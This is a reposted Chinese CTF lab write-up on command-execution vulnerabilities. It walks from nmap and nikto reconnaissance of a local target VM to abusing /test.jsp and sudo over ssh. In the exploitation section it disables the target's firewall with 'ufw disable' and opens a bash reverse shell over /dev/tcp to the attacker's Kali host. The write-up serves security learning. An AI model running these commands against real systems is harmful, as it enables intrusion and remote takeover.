CTF-命令执行【超详细】
后台-插件-广告管理-内容页头部广告(手机) |
前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html
网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan
目录
命令执行漏洞介绍
实验环境
信息探测
nmap -sV 192.168.20.136
访问192.168.20.136:8080
敏感信息探测
进行系统命令执行
列出/tmp目录下的文件
列出/home目录下的内容
读取敏感信息
漏洞利用
利用ssh协议执行root权限的命令
关闭Ubuntu中的防火墙
提权
监听端口
靶机反弹shell
查看flag
命令执行漏洞介绍
当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。
调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有多虑用户输入的情况下,就会造成命令执行漏洞。
实验环境
kali 192.168.20.128
靶机 192.168.20.136
链接:https://pan.baidu.com/s/1OgpClNu8ggDEc_DBTRD57Q
提取码:t1x0
信息探测
nmap -sV 192.168.20.136
访问192.168.20.136:8080
发现敏感信息
敏感信息探测
nikto -host http://192.168.20.136:8080
发现/test.jsp并进行访问
进行系统命令执行
列出/tmp目录下的文件
列出/home目录下的内容
读取敏感信息
漏洞利用
利用ssh协议执行root权限的命令
ssh bill@localhost sudo -l
关闭Ubuntu中的防火墙
ssh bill@localhost sudo ufw disable
提权
监听端口
靶机反弹shell
ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.20.128/4444 0>&1
查看flag
1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。
在线投稿:投稿 站长QQ:1888636
后台-插件-广告管理-内容页尾部广告(手机) |